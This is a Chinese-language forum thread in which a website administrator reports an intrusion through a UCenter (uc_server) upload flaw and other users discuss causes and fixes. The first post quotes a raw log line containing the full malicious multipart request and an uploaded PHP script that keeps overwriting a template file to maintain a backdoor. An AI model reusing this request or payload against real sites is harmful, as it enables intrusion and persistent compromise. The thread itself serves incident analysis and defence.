uc_service上传漏洞

[06/Nov/2017:20:56:22 +0800] 500 0.768 172.104.117.118 "POST /uc_server/admin.php?m=app&a=ping&appid=20&sid=3dbbCQPdkWLguSLAoPKd%2BgU04gJAjpZkNG4FIGCGBFXEcauBVZXktCsh9AxzFyvR%2FjUdydFfvmox4Q HTTP/1.1" 100332 "http://www.abc.com/uc_server/admin.php?m=app&a=ping&appid=20&sid=3dbbCQPdkWLguSLAoPKd%2BgU04gJAjpZkNG4FIGCGBFXEcauBVZXktCsh9AxzFyvR%2FjUdydFfvmox4Q" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.12 (KHTML, like Gecko) Chrome/9.0.579.0" "m=app&a=ping&appid=20&sid=3dbbCQPdkWLguSLAoPKd%2BgU04gJAjpZkNG4FIGCGBFXEcauBVZXktCsh9AxzFyvR%2FjUdydFfvmox4Q" "-----------------------------64261247712478\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A/data/www/abc/abc.com/data/template/\x0D\x0A-----------------------------64261247712478\x0D\x0AContent-Disposition: form-data; name=\x22upfile\x22; filename=\x22New Text Document (20).txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0A\x0D\x0A<?php\x0D\x0Aignore_user_abort(true);\x0D\x0Aset_time_limit(0);\x0D\x0Awhile(1) {\x0D\x0A$file = '/data/www/abc/abc.com/data/cache/9';\x0D\x0A$newfile = '/data/www/abc/abc.com/data/template/4_qqconnect_module.tpl.php';\x0D\x0Achmod($newfile,0777);\x0D\x0Aif (!copy($file, $newfile)) {\x0D\x0A    echo \x22\x22;\x0D\x0A}\x0D\x0Achmod(\x22/data/www/abc/abc.com/data/template/4_qqconnect_module.tpl.php\x22,0444);\x0D\x0Asleep(100); //\xE5\x8D\x8A\xE5\xB0\x8F\xE6\x97\xB6\xE6\x89\xA7\xE8\xA1\x8C\xE4\xB8\x80\xE6\xAC\xA1\x0D\x0A}\x0D\x0A?>\x0D\x0A\x0D\x0A-----------------------------64261247712478\x0D\x0AContent-Disposition: form-data; name=\x22rename\x22\x0D\x0A\x0D\x0A4_qqconnect_module.tpl.php\x0D\x0A-----------------------------64261247712478--\x0D\x0A"

通过uc_server/admin.php?m=app&这样的地址以Content-Disposition: form-data的方式上传代码入侵。先将恶意代码写人cache目录再将其copy到data/template目录的缓存模板中形成后门。更多的日志记录信息希望版主联系我私聊

IN_UCKEY被利用

iTouch_sS2Tt 发表于 2017-11-7 15:08
IN_UCKEY被利用

升级最新版吧，UCKEY的漏洞修复都很久了，并且要利用这类漏洞前，别人首先已经通过其他漏洞拿到过你网站的UCKEY，所以UCKEY也得修改

民审大大 发表于 2017-11-7 15:30
升级最新版吧，UCKEY的漏洞修复都很久了，并且要利用这类漏洞前，别人首先已经通过其他漏洞拿到过你网站 ...

民审大大  这个漏洞我已经补上了，并且我对代码已经做了监控了。现在的情况是他根本没有动我的核心代码，只是修改data目录下的 cache 或者 template等可写目录，尤其是template下的文件会被引用到核心代码中，他以此就形成后门了。大大！！

iTouch_sS2Tt 发表于 2017-11-7 15:52
民审大大  这个漏洞我已经补上了，并且我对代码已经做了监控了。现在的情况是他根本没有动我的核心代码， ...

建议你找人彻底查下是不是有残留的后门

民审大大 发表于 2017-11-7 16:19
建议你找人彻底查下是不是有残留的后门

民审大大  我已经通过git的方式对代码做过对比了  哎。。。头疼 还要忙别的事

真的是bug啊

民审大大 发表于 2017-11-7 16:19
建议你找人彻底查下是不是有残留的后门

我仔细看日志 排查了一下，应该是 UCKEY泄露 导致被利用 ，做了修改出来（漏洞是早就修复了的），，但始终还是有个奇怪的地方，通过日志信息发现 他可以通过POST   /uc_server/admin.php?m=app&a=ping&appid=20&sid=3dbbCQPdkWLguSLAoPKd%2BgU04gJAjpZkNG4FIGCGBFXEcauBVZXktCsh9AxzFyvR%2FjUdydFfvmox4Q  这样的路径实现上传文件的动作。。我有时间还会继续追查一下。。并且可以实现www用户的提权操作也是一直百思不得其解

iTouch_sS2Tt 发表于 2017-11-8 15:29
我仔细看日志 排查了一下，应该是 UCKEY泄露 导致被利用 ，做了修改出来（漏洞是早就修复了的），，但始 ...

请教一下这位兄台，我也遇到了同样的问题，被挂马了，版本X3.2，管理员密码被修改，阿里云安骑士删掉后木马后，今天又被挂马了。头痛不知道怎么处理。

阿里云服务器，win2003, IIS6.0，服务器上有网站安全狗和阿里云自带的安骑士。

coolhey 发表于 2017-11-13 12:18
请教一下这位兄台，我也遇到了同样的问题，被挂马了，版本X3.2，管理员密码被修改，阿里云安骑士删掉后 ...

这个漏洞已经找到了，请见我发的bug帖。你如果对服务器配置熟悉，可以把UCcenter的后台管理地址禁止外网访问。。。简单粗暴的方法是把UCcenter下的admin.php移除，需要的时候再移过来。。。当然最后还是需要再清理一下木马